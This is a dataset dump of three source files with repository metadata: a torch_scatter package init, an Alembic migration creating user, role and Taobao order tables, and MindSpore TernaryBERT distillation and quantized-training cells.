blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ec5779ee0e273f9ab8b597108e3e042acb1ccd27 | 591900bf248906d0c80fbb02174b0c3be6de376f | /torch_scatter/__init__.py | e43f88eefbc902eb16d43b425fbd5f348a6e202f | [
"MIT"
] | permissive | xychen9459/pytorch_scatter | 0e02a2028faa98acc30fa3b7b082ea52cab5f70c | b9570ccd71622f9a7b2d311a1607bb3914801743 | refs/heads/master | 2020-04-17T00:09:30.541736 | 2018-12-27T11:37:55 | 2018-12-27T11:37:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from .add import scatter_add
from .sub import scatter_sub
from .mul import scatter_mul
from .div import scatter_div
from .mean import scatter_mean
from .std import scatter_std
from .max import scatter_max
from .min import scatter_min
# Package version; exposed to users and re-exported through __all__.
__version__ = '1.1.0'
# Public API of the package: star-imports expose exactly these names.
__all__ = [
    'scatter_add',
    'scatter_sub',
    'scatter_mul',
    'scatter_div',
    'scatter_mean',
    'scatter_std',
    'scatter_max',
    'scatter_min',
    '__version__',
]
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
4e0fa240c27baaa6dccf933cc096661b4781f451 | 895e098c97866710843e7da03e8eb094c4e08b3c | /migrations/versions/fdae8a8a7871_.py | 9e465e5084fd279aca54dd7644cb598a91bb4146 | [] | no_license | aqrun/taojiji | eb3716ed7664ea1c25c9bfa244aad19cc2e17e3d | 0ffef9001bfc79ec9eae9550831c8095cfd66187 | refs/heads/master | 2020-08-15T23:23:16.275926 | 2020-03-13T01:20:23 | 2020-03-13T01:20:23 | 215,422,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,083 | py | """empty message
Revision ID: fdae8a8a7871
Revises:
Create Date: 2019-10-24 23:44:09.359342
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'fdae8a8a7871'
# down_revision is None: this is the first migration in the chain.
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema: files, role, taobao_orders, user,
    roles_users and taobao_products tables.

    Tables with foreign keys (roles_users, taobao_products) are created
    after the tables they reference.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    # Uploaded-file registry; user_id is stored as a plain column (no FK).
    op.create_table('files',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=250), nullable=False),
    sa.Column('uri', sa.String(length=250), nullable=False),
    sa.Column('extension', sa.String(length=32), nullable=True),
    sa.Column('location', sa.String(length=32), nullable=False),
    sa.Column('status', sa.Integer(), nullable=True),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('role',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=True),
    sa.Column('description', sa.String(length=250), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    # Taobao order headers; order_id is unique and is referenced by
    # taobao_products below.
    op.create_table('taobao_orders',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('order_id', sa.String(length=64), nullable=False, comment='订单编号'),
    sa.Column('buyer_company_name', sa.String(length=250), nullable=True, comment='买家公司名'),
    sa.Column('buyer_username', sa.String(length=128), nullable=True, comment='买家会员名'),
    sa.Column('seller_company_name', sa.String(length=250), nullable=True, comment='卖家会员名'),
    sa.Column('seller_username', sa.String(length=128), nullable=True, comment='卖家会员名'),
    sa.Column('price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='货品总价'),
    sa.Column('shipping_fee', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='运费'),
    sa.Column('discount', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='折扣或涨价'),
    sa.Column('real_price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='实付款'),
    sa.Column('status', sa.String(length=128), nullable=True, comment='订单状态'),
    sa.Column('create_time', sa.DateTime(), nullable=True, comment='订单创建时间'),
    sa.Column('payment_time', sa.DateTime(), nullable=True, comment='订单付款时间'),
    sa.Column('sender', sa.String(length=250), nullable=True, comment='发货方'),
    sa.Column('receiver_name', sa.String(length=128), nullable=True, comment='收货人姓名'),
    sa.Column('receiver_address', sa.String(length=250), nullable=True, comment='收货地址'),
    sa.Column('receiver_postcode', sa.String(length=20), nullable=True, comment='邮编'),
    sa.Column('receiver_phone', sa.String(length=250), nullable=True, comment='联系电话'),
    sa.Column('receiver_cellphone', sa.String(length=250), nullable=True, comment='联系手机'),
    sa.Column('product_category', sa.String(length=20), nullable=True, comment='货品种类'),
    sa.Column('comment', sa.String(length=250), nullable=True, comment='买家留言'),
    sa.Column('logistic_company_name', sa.String(length=250), nullable=True, comment='物流公司'),
    sa.Column('logistic_bill_number', sa.String(length=64), nullable=True, comment='物流单号'),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('order_id')
    )
    op.create_table('user',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('email', sa.String(length=250), nullable=True),
    sa.Column('username', sa.String(length=128), nullable=True),
    sa.Column('password', sa.String(length=128), nullable=True),
    sa.Column('last_login_at', sa.DateTime(), nullable=True),
    sa.Column('current_login_at', sa.DateTime(), nullable=True),
    sa.Column('last_login_ip', sa.String(length=100), nullable=True),
    sa.Column('current_login_ip', sa.String(length=100), nullable=True),
    sa.Column('login_count', sa.Integer(), nullable=True),
    sa.Column('active', sa.Boolean(), nullable=True),
    sa.Column('confirmed_at', sa.DateTime(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email')
    )
    # Many-to-many association table between user and role.
    op.create_table('roles_users',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.Column('role_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['role_id'], ['role.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # Order line items; cascade-deleted with their parent order.
    op.create_table('taobao_products',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('order_id', sa.String(length=64), nullable=True),
    sa.Column('product_name', sa.String(length=250), nullable=True, comment='货品标题'),
    sa.Column('unit_price', sa.DECIMAL(precision=10, scale=2), nullable=True, comment='单价'),
    sa.Column('quantity', sa.Integer(), nullable=True, comment='数量'),
    sa.Column('unit', sa.String(length=20), nullable=True, comment='单位'),
    sa.Column('product_code', sa.String(length=128), nullable=True, comment='货号'),
    sa.Column('spec', sa.String(length=32), nullable=True, comment='型号'),
    sa.Column('wuliao_code', sa.String(length=32), nullable=True, comment='物料编号'),
    sa.Column('danpin_code', sa.String(length=32), nullable=True, comment='单品货号'),
    sa.ForeignKeyConstraint(['order_id'], ['taobao_orders.order_id'], ondelete='CASCADE'),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop every table created by upgrade().

    Order matters: tables holding foreign keys (taobao_products,
    roles_users) are dropped before the tables they reference.
    """
    for table_name in ('taobao_products', 'roles_users', 'user',
                       'taobao_orders', 'role', 'files'):
        op.drop_table(table_name)
| [
"aqrun@sina.com"
] | aqrun@sina.com |
ac35f0bcc030ddf42a3ceca0aca26e8cd742efbf | bf7f457e73780694af1c688f55fac3ba2413e82f | /model_zoo/research/nlp/ternarybert/src/cell_wrapper.py | 2c505b9db0401f08666782cf11c471914f5d774b | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"Libpng",
"IJG",
"Zlib",
"MIT",
"MPL-2.0",
"BSD-3-Clause-Open-MPI",
"MPL-2.0-no-copyleft-exception",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"AGPL-3... | permissive | chncwang/mindspore | 974441b85c9edc1e1ce30e086e9d33fb1ab2052c | 6dac92aedf0aa1541d181e6aedab29aaadc2dafb | refs/heads/master | 2023-03-10T11:13:31.752406 | 2021-03-02T11:21:09 | 2021-03-02T11:21:09 | 343,701,879 | 0 | 0 | Apache-2.0 | 2021-03-02T11:56:25 | 2021-03-02T08:38:28 | null | UTF-8 | Python | false | false | 23,500 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Train Cell."""
import mindspore.nn as nn
from mindspore import context
from mindspore.ops import operations as P
from mindspore.ops import functional as F
from mindspore.ops import composite as C
from mindspore.common.tensor import Tensor
from mindspore.common import dtype as mstype
from mindspore.common.parameter import Parameter
from mindspore.communication.management import get_group_size
from mindspore.nn.wrap.grad_reducer import DistributedGradReducer
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from .tinybert_model import BertModelCLS
from .quant import QuantizeWeightCell
from .config import gradient_cfg
class ClipByNorm(nn.Cell):
    r"""
    Clips tensor values to a maximum :math:`L_2`-norm.
    The output of this layer remains the same if the :math:`L_2`-norm of the input tensor
    is not greater than the argument clip_norm. Otherwise the tensor will be normalized as:
    .. math::
        \text{output}(X) = \frac{\text{clip_norm} * X}{L_2(X)},
    where :math:`L_2(X)` is the :math:`L_2`-norm of :math:`X`.
    Args:
        axis (Union[None, int, tuple(int)]): Compute the L2-norm along the Specific dimension.
            Default: None, all dimensions to calculate.
    Inputs:
        - **input** (Tensor) - Tensor of shape N-D. The type must be float32 or float16.
        - **clip_norm** (Tensor) - A scalar Tensor of shape :math:`()` or :math:`(1)`.
          Or a tensor shape can be broadcast to input shape.
    Outputs:
        Tensor, clipped tensor with the same shape as the input, whose type is float32.
    Supported Platforms:
        ``Ascend`` ``GPU``
    Examples:
        >>> net = nn.ClipByNorm()
        >>> input = Tensor(np.random.randint(0, 10, [4, 16]), mindspore.float32)
        >>> clip_norm = Tensor(np.array([100]).astype(np.float32))
        >>> output = net(input, clip_norm)
        >>> print(output.shape)
        (4, 16)
    """
    def __init__(self):
        super(ClipByNorm, self).__init__()
        self.reduce_sum = P.ReduceSum(keep_dims=True)
        self.select_ = P.Select()
        self.greater_ = P.Greater()
        self.cast = P.Cast()
        self.sqrt = P.Sqrt()
        self.max_op = P.Maximum()
        self.shape = P.Shape()
        self.reshape = P.Reshape()
        self.fill = P.Fill()
        self.expand_dims = P.ExpandDims()
        self.dtype = P.DType()
    def construct(self, x, clip_norm):
        """add ms_function decorator for pynative mode"""
        # Sum of squares of x; a 1-element tensor skips the reduction.
        mul_x = F.square(x)
        if mul_x.shape == (1,):
            l2sum = self.cast(mul_x, mstype.float32)
        else:
            l2sum = self.cast(self.reduce_sum(mul_x), mstype.float32)
        cond = self.greater_(l2sum, 0)
        # Guard against sqrt(0): substitute 1.0 where the sum is zero, then
        # select the real sqrt only where the sum was positive.
        ones_ = self.fill(self.dtype(cond), self.shape(cond), 1.0)
        l2sum_safe = self.select_(cond, l2sum, self.cast(ones_, self.dtype(l2sum)))
        l2norm = self.select_(cond, self.sqrt(l2sum_safe), l2sum)
        # output = x * clip_norm / max(l2norm, clip_norm): identity when the
        # norm is within the bound, rescaled to clip_norm otherwise.
        intermediate = x * clip_norm
        max_norm = self.max_op(l2norm, clip_norm)
        values_clip = self.cast(intermediate, mstype.float32) / self.expand_dims(max_norm, -1)
        values_clip = self.reshape(values_clip, self.shape(x))
        values_clip = F.identity(values_clip)
        return values_clip
# Multitype graph dispatching gradient clipping over heterogeneous grads.
clip_grad = C.MultitypeFuncGraph("clip_grad")
# pylint: disable=consider-using-in
@clip_grad.register("Number", "Number", "Tensor")
def _clip_grad(clip_type, clip_value, grad):
    """
    Clip gradients.
    Inputs:
        clip_type (int): The way to clip, 0 for 'value', 1 for 'norm'.
        clip_value (float): Specifies how much to clip.
        grad (tuple[Tensor]): Gradients.
    Outputs:
        tuple[Tensor], clipped gradients.
    """
    # Any clip_type other than 0/1 means "no clipping".
    if clip_type != 0 and clip_type != 1:
        return grad
    dt = F.dtype(grad)
    if clip_type == 0:
        # Element-wise clamp into [-clip_value, clip_value].
        new_grad = C.clip_by_value(grad, F.cast(F.tuple_to_array((-clip_value,)), dt),
                                   F.cast(F.tuple_to_array((clip_value,)), dt))
    else:
        # Rescale so that the L2 norm does not exceed clip_value.
        new_grad = ClipByNorm()(grad, F.cast(F.tuple_to_array((clip_value,)), dt))
    return new_grad
# Multitype graph that undoes the loss-scaling factor on each gradient.
grad_scale = C.MultitypeFuncGraph("grad_scale")
reciprocal = P.Reciprocal()
@grad_scale.register("Tensor", "Tensor")
def tensor_grad_scale(scale, grad):
    """Divide a gradient tensor by the loss scale (grad / scale)."""
    return grad * reciprocal(scale)
class ClipGradients(nn.Cell):
    """
    Clip gradients.
    Inputs:
        grads (list): List of gradient tuples.
        clip_type (Tensor): The way to clip, 'value' or 'norm'.
        clip_value (Tensor): Specifies how much to clip.
    Returns:
        List, a list of clipped_grad tuples.
    """
    def __init__(self):
        super(ClipGradients, self).__init__()
        self.clip_by_norm = nn.ClipByNorm()
        self.cast = P.Cast()
        self.dtype = P.DType()
    def construct(self,
                  grads,
                  clip_type,
                  clip_value):
        """clip gradients"""
        # Any clip_type other than 0 (by value) or 1 (by norm) is a no-op.
        if clip_type != 0 and clip_type != 1:
            return grads
        new_grads = ()
        for grad in grads:
            dt = self.dtype(grad)
            if clip_type == 0:
                # Element-wise clamp into [-clip_value, clip_value].
                t = C.clip_by_value(grad, self.cast(F.tuple_to_array((-clip_value,)), dt),
                                    self.cast(F.tuple_to_array((clip_value,)), dt))
            else:
                # Rescale so the gradient's L2 norm does not exceed clip_value.
                t = self.clip_by_norm(grad, self.cast(F.tuple_to_array((clip_value,)), dt))
            new_grads = new_grads + (t,)
        return new_grads
class SoftmaxCrossEntropy(nn.Cell):
    """Soft-target cross-entropy for knowledge distillation.

    Computes mean(-softmax(targets) * log_softmax(predicts)), pulling the
    student's predicted distribution toward the teacher's soft labels.
    """
    def __init__(self):
        super(SoftmaxCrossEntropy, self).__init__()
        self.log_softmax = P.LogSoftmax(axis=-1)
        self.softmax = P.Softmax(axis=-1)
        self.reduce_mean = P.ReduceMean()
        self.cast = P.Cast()
    def construct(self, predicts, targets):
        # Teacher distribution (soft labels) and student log-probabilities.
        soft_labels = self.softmax(targets)
        log_probs = self.log_softmax(predicts)
        cross_entropy = self.reduce_mean(-soft_labels * log_probs)
        return self.cast(cross_entropy, mstype.float32)
class BertNetworkWithLoss(nn.Cell):
    """
    Provide bert pre-training loss through network.

    Builds a frozen teacher BERT classifier and a trainable student, and
    computes the distillation loss (attention-map MSE, hidden-state MSE,
    soft cross-entropy on logits, and optional hard-label loss).
    Args:
        teacher_config (BertConfig): The config of BertModel.
        is_training (bool): Specifies whether to use the training mode.
        use_one_hot_embeddings (bool): Specifies whether to use one-hot for embeddings. Default: False.
    Returns:
        Tensor, the loss of the network.
    """
    def __init__(self, teacher_config, teacher_ckpt, student_config, student_ckpt,
                 is_training, task_type, num_labels, use_one_hot_embeddings=False,
                 temperature=1.0, dropout_prob=0.1):
        super(BertNetworkWithLoss, self).__init__()
        # load teacher model
        self.teacher = BertModelCLS(teacher_config, False, num_labels, dropout_prob,
                                    use_one_hot_embeddings, "teacher")
        param_dict = load_checkpoint(teacher_ckpt)
        new_param_dict = {}
        # Checkpoint keys are re-prefixed with 'teacher.' to match this
        # cell's parameter namespace before loading.
        for key, value in param_dict.items():
            new_key = 'teacher.' + key
            new_param_dict[new_key] = value
        load_param_into_net(self.teacher, new_param_dict)
        # no_grad
        self.teacher.set_train(False)
        params = self.teacher.trainable_params()
        for param in params:
            param.requires_grad = False
        # load student model
        self.bert = BertModelCLS(student_config, is_training, num_labels, dropout_prob,
                                 use_one_hot_embeddings, "student")
        param_dict = load_checkpoint(student_ckpt)
        new_param_dict = {}
        # Same re-prefixing for the student, under 'bert.'.
        for key, value in param_dict.items():
            new_key = 'bert.' + key
            new_param_dict[new_key] = value
        load_param_into_net(self.bert, new_param_dict)
        self.cast = P.Cast()
        self.teacher_layers_num = teacher_config.num_hidden_layers
        self.student_layers_num = student_config.num_hidden_layers
        # Each student layer is matched against one of every
        # `layers_per_block` teacher layers.
        self.layers_per_block = int(self.teacher_layers_num / self.student_layers_num)
        self.is_att_fit = student_config.is_att_fit
        self.is_rep_fit = student_config.is_rep_fit
        self.is_lgt_fit = student_config.is_lgt_fit
        self.task_type = task_type
        self.temperature = temperature
        self.loss_mse = nn.MSELoss()
        self.lgt_fct = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
        self.select = P.Select()
        self.zeroslike = P.ZerosLike()
        self.dtype = student_config.dtype
        self.num_labels = num_labels
        self.soft_cross_entropy = SoftmaxCrossEntropy()
        self.compute_type = student_config.compute_type
        self.embedding_bits = student_config.embedding_bits
        self.weight_bits = student_config.weight_bits
        self.weight_clip_value = student_config.weight_clip_value
        self.reshape = P.Reshape()
    def construct(self,
                  input_ids,
                  input_mask,
                  token_type_id,
                  label_ids):
        """task distill network with loss"""
        # teacher model
        teacher_seq_output, teacher_att_output, teacher_logits, _ = self.teacher(input_ids, token_type_id, input_mask)
        # student model
        student_seq_output, student_att_output, student_logits, _ = self.bert(input_ids, token_type_id, input_mask)
        total_loss = 0
        if self.is_att_fit:
            # Pair each student attention map with the teacher layer at the
            # end of its block.
            selected_teacher_att_output = ()
            selected_student_att_output = ()
            for i in range(self.student_layers_num):
                selected_teacher_att_output += (teacher_att_output[(i + 1) * self.layers_per_block - 1],)
                selected_student_att_output += (student_att_output[i],)
            att_loss = 0
            for i in range(self.student_layers_num):
                student_att = selected_student_att_output[i]
                teacher_att = selected_teacher_att_output[i]
                # Masked positions carry large negative scores; zero them so
                # they do not dominate the MSE.
                student_att = self.select(student_att <= self.cast(-100.0, mstype.float32),
                                          self.zeroslike(student_att),
                                          student_att)
                teacher_att = self.select(teacher_att <= self.cast(-100.0, mstype.float32),
                                          self.zeroslike(teacher_att),
                                          teacher_att)
                att_loss += self.loss_mse(student_att, teacher_att)
            total_loss += att_loss
        if self.is_rep_fit:
            # Hidden-state fitting includes the embedding output, hence the
            # extra "+ 1" layer.
            selected_teacher_seq_output = ()
            selected_student_seq_output = ()
            for i in range(self.student_layers_num + 1):
                selected_teacher_seq_output += (teacher_seq_output[i * self.layers_per_block],)
                selected_student_seq_output += (student_seq_output[i],)
            rep_loss = 0
            for i in range(self.student_layers_num + 1):
                student_rep = selected_student_seq_output[i]
                teacher_rep = selected_teacher_seq_output[i]
                rep_loss += self.loss_mse(student_rep, teacher_rep)
            total_loss += rep_loss
        if self.task_type == 'classification':
            # Temperature-softened soft cross-entropy against teacher logits.
            cls_loss = self.soft_cross_entropy(student_logits / self.temperature, teacher_logits / self.temperature)
            if self.is_lgt_fit:
                # Optional hard-label loss on the true labels.
                student_logits = self.cast(student_logits, mstype.float32)
                label_ids_reshape = self.reshape(self.cast(label_ids, mstype.int32), (-1,))
                lgt_loss = self.lgt_fct(student_logits, label_ids_reshape)
                total_loss += lgt_loss
        else:
            # Regression task: MSE between flattened logits and labels.
            student_logits = self.reshape(student_logits, (-1,))
            label_ids = self.reshape(label_ids, (-1,))
            cls_loss = self.loss_mse(student_logits, label_ids)
        total_loss += cls_loss
        return self.cast(total_loss, mstype.float32)
class BertTrainWithLossScaleCell(nn.Cell):
    """
    Specifically defined for finetuning where only four inputs tensor are needed.

    One training step with dynamic loss scaling and overflow detection.
    Each step: (1) snapshot the full-precision weights, (2) overwrite the
    selected embedding/weight parameters with their quantized values so the
    forward/backward pass sees quantized weights, (3) compute scaled
    gradients, (4) restore the full-precision weights, and (5) apply the
    optimizer only if no numeric overflow occurred.
    """
    def __init__(self, network, optimizer, scale_update_cell=None):
        super(BertTrainWithLossScaleCell, self).__init__(auto_prefix=False)
        self.network = network
        self.network.set_grad()
        self.weights = optimizer.parameters
        self.optimizer = optimizer
        self.grad = C.GradOperation(get_by_list=True,
                                    sens_param=True)
        self.reducer_flag = False
        self.allreduce = P.AllReduce()
        self.parallel_mode = context.get_auto_parallel_context("parallel_mode")
        if self.parallel_mode in [ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL]:
            self.reducer_flag = True
        self.grad_reducer = F.identity
        self.degree = 1
        if self.reducer_flag:
            # Distributed run: average gradients across `degree` devices.
            self.degree = get_group_size()
            self.grad_reducer = DistributedGradReducer(optimizer.parameters, False, self.degree)
        self.clip_type = gradient_cfg.clip_type
        self.clip_value = gradient_cfg.clip_value
        self.is_distributed = (self.parallel_mode != ParallelMode.STAND_ALONE)
        self.cast = P.Cast()
        # NPU float-status ops used to detect inf/nan produced during the
        # backward pass.
        self.alloc_status = P.NPUAllocFloatStatus()
        self.get_status = P.NPUGetFloatStatus()
        self.clear_before_grad = P.NPUClearFloatStatus()
        self.reduce_sum = P.ReduceSum(keep_dims=False)
        self.depend_parameter_use = P.ControlDepend(depend_mode=1)
        self.base = Tensor(1, mstype.float32)
        self.less_equal = P.LessEqual()
        self.hyper_map = C.HyperMap()
        self.loss_scale = None
        self.loss_scaling_manager = scale_update_cell
        if scale_update_cell:
            self.loss_scale = Parameter(Tensor(scale_update_cell.get_loss_scale(), dtype=mstype.float32))
        # Shadow copy holding the full-precision weights while the live
        # parameters temporarily carry quantized values.
        self.saved_params = self.weights.clone(prefix='saved')
        self.length = len(self.weights)
        # Indices of parameters to quantize: embedding tables vs. all other
        # weights except the final dense layer ('dense_1').
        self.quant_embedding_list = []
        self.quant_weight_list = []
        for i, key in enumerate(self.saved_params):
            if 'embedding_lookup' in key.name:
                self.quant_embedding_list.append(i)
            elif 'weight' in key.name and 'dense_1' not in key.name:
                self.quant_weight_list.append(i)
        self.quant_embedding_list_length = len(self.quant_embedding_list)
        self.quant_weight_list_length = len(self.quant_weight_list)
        self.quantize_embedding = QuantizeWeightCell(num_bits=network.embedding_bits,
                                                     compute_type=network.compute_type,
                                                     clip_value=network.weight_clip_value)
        self.quantize_weight = QuantizeWeightCell(num_bits=network.weight_bits,
                                                  compute_type=network.compute_type,
                                                  clip_value=network.weight_clip_value)
    @C.add_flags(has_effect=True)
    def construct(self,
                  input_ids,
                  input_mask,
                  token_type_id,
                  label_ids,
                  sens=None):
        """Defines the computation performed."""
        weights = self.weights
        # Snapshot full-precision weights before quantizing in place.
        saved = ()
        for i in range(self.length):
            saved = saved + (F.assign(self.saved_params[i], weights[i]),)
        # Overwrite embeddings/weights with quantized values; control_depend
        # forces the snapshot to complete first.
        assign_embedding = ()
        for i in range(self.quant_embedding_list_length):
            quant_embedding = self.quantize_embedding(weights[self.quant_embedding_list[i]])
            assign_embedding = assign_embedding + (F.assign(weights[self.quant_embedding_list[i]], quant_embedding),)
            F.control_depend(saved, assign_embedding[i])
        assign_weight = ()
        for i in range(self.quant_weight_list_length):
            quant_weight = self.quantize_weight(weights[self.quant_weight_list[i]])
            assign_weight = assign_weight + (F.assign(weights[self.quant_weight_list[i]], quant_weight),)
            F.control_depend(saved, assign_weight[i])
        # All quantized assignments must land before the forward pass reads
        # input_ids.
        for i in range(self.quant_embedding_list_length):
            F.control_depend(assign_embedding[i], input_ids)
        for i in range(self.quant_weight_list_length):
            F.control_depend(assign_weight[i], input_ids)
        if sens is None:
            scaling_sens = self.loss_scale
        else:
            scaling_sens = sens
        # alloc status and clear should be right before grad operation
        init = self.alloc_status()
        self.clear_before_grad(init)
        grads = self.grad(self.network, weights)(input_ids,
                                                 input_mask,
                                                 token_type_id,
                                                 label_ids,
                                                 self.cast(scaling_sens,
                                                           mstype.float32))
        F.control_depend(input_ids, grads)
        # apply grad reducer on grads
        grads = self.grad_reducer(grads)
        # Undo the loss scale (times device count) and clip.
        grads = self.hyper_map(F.partial(grad_scale, scaling_sens * self.degree), grads)
        grads = self.hyper_map(F.partial(clip_grad, self.clip_type, self.clip_value), grads)
        # Restore the full-precision weights once gradients are computed.
        restore = ()
        for i in range(self.length):
            restore = restore + (F.assign(weights[i], self.saved_params[i]),)
            F.control_depend(grads, restore[i])
        self.get_status(init)
        flag_sum = self.reduce_sum(init, (0,))
        if self.is_distributed:
            # sum overflow flag over devices
            flag_reduce = self.allreduce(flag_sum)
            cond = self.less_equal(self.base, flag_reduce)
        else:
            cond = self.less_equal(self.base, flag_sum)
        overflow = cond
        if sens is None:
            overflow = self.loss_scaling_manager(self.loss_scale, cond)
        # Skip the optimizer step entirely when an overflow was detected.
        if overflow:
            succ = False
        else:
            succ = self.optimizer(grads)
        for i in range(self.length):
            F.control_depend(restore[i], succ)
        return succ
class BertTrainCell(nn.Cell):
    """
    Specifically defined for finetuning where only four inputs tensor are needed.

    One training step without loss scaling (fixed sensitivity `sens`).
    Same quantize-train-restore flow as BertTrainWithLossScaleCell: the
    selected parameters are temporarily replaced by their quantized values
    for the forward/backward pass, then restored before the optimizer step.
    """
    def __init__(self, network, optimizer, sens=1.0):
        super(BertTrainCell, self).__init__(auto_prefix=False)
        self.network = network
        self.network.set_grad()
        self.weights = optimizer.parameters
        self.optimizer = optimizer
        self.sens = sens
        self.grad = C.GradOperation(get_by_list=True,
                                    sens_param=True)
        self.clip_type = gradient_cfg.clip_type
        self.clip_value = gradient_cfg.clip_value
        self.reducer_flag = False
        self.parallel_mode = context.get_auto_parallel_context("parallel_mode")
        if self.parallel_mode in [ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL]:
            self.reducer_flag = True
        self.grad_reducer = F.identity
        self.degree = 1
        if self.reducer_flag:
            # Distributed run: reduce gradients across `degree` devices.
            mean = context.get_auto_parallel_context("gradients_mean")
            self.degree = get_group_size()
            self.grad_reducer = DistributedGradReducer(optimizer.parameters, mean, self.degree)
        self.is_distributed = (self.parallel_mode != ParallelMode.STAND_ALONE)
        self.cast = P.Cast()
        self.hyper_map = C.HyperMap()
        # Shadow copy of the full-precision weights used while the live
        # parameters temporarily carry quantized values.
        self.saved_params = self.weights.clone(prefix='saved')
        self.length = len(self.weights)
        # Indices of parameters to quantize; fake-quant min/max parameters
        # and the final dense layer ('dense_1') are excluded.
        self.quant_embedding_list = []
        self.quant_weight_list = []
        for i, key in enumerate(self.saved_params):
            if 'embedding_lookup' in key.name and 'min' not in key.name and 'max' not in key.name:
                self.quant_embedding_list.append(i)
            elif 'weight' in key.name and 'dense_1' not in key.name:
                self.quant_weight_list.append(i)
        self.quant_embedding_list_length = len(self.quant_embedding_list)
        self.quant_weight_list_length = len(self.quant_weight_list)
        self.quantize_embedding = QuantizeWeightCell(num_bits=network.embedding_bits,
                                                     compute_type=network.compute_type,
                                                     clip_value=network.weight_clip_value)
        self.quantize_weight = QuantizeWeightCell(num_bits=network.weight_bits,
                                                  compute_type=network.compute_type,
                                                  clip_value=network.weight_clip_value)
    def construct(self,
                  input_ids,
                  input_mask,
                  token_type_id,
                  label_ids):
        """Defines the computation performed."""
        weights = self.weights
        # Snapshot full-precision weights before quantizing in place.
        saved = ()
        for i in range(self.length):
            saved = saved + (F.assign(self.saved_params[i], weights[i]),)
        # Overwrite embeddings/weights with quantized values; control_depend
        # forces the snapshot to complete first.
        assign_embedding = ()
        for i in range(self.quant_embedding_list_length):
            quant_embedding = self.quantize_embedding(weights[self.quant_embedding_list[i]])
            assign_embedding = assign_embedding + (F.assign(weights[self.quant_embedding_list[i]], quant_embedding),)
            F.control_depend(saved, assign_embedding[i])
        assign_weight = ()
        for i in range(self.quant_weight_list_length):
            quant_weight = self.quantize_weight(weights[self.quant_weight_list[i]])
            assign_weight = assign_weight + (F.assign(weights[self.quant_weight_list[i]], quant_weight),)
            F.control_depend(saved, assign_weight[i])
        # All quantized assignments must land before the forward pass reads
        # input_ids.
        for i in range(self.quant_embedding_list_length):
            F.control_depend(assign_embedding[i], input_ids)
        for i in range(self.quant_weight_list_length):
            F.control_depend(assign_weight[i], input_ids)
        grads = self.grad(self.network, weights)(input_ids,
                                                 input_mask,
                                                 token_type_id,
                                                 label_ids,
                                                 self.cast(F.tuple_to_array((self.sens,)),
                                                           mstype.float32))
        F.control_depend(input_ids, grads)
        # apply grad reducer on grads
        grads = self.grad_reducer(grads)
        grads = self.hyper_map(F.partial(clip_grad, self.clip_type, self.clip_value), grads)
        # Restore the full-precision weights once gradients are computed.
        restore = ()
        for i in range(self.length):
            restore = restore + (F.assign(weights[i], self.saved_params[i]),)
            F.control_depend(grads, restore[i])
        succ = self.optimizer(grads)
        for i in range(self.length):
            F.control_depend(restore[i], succ)
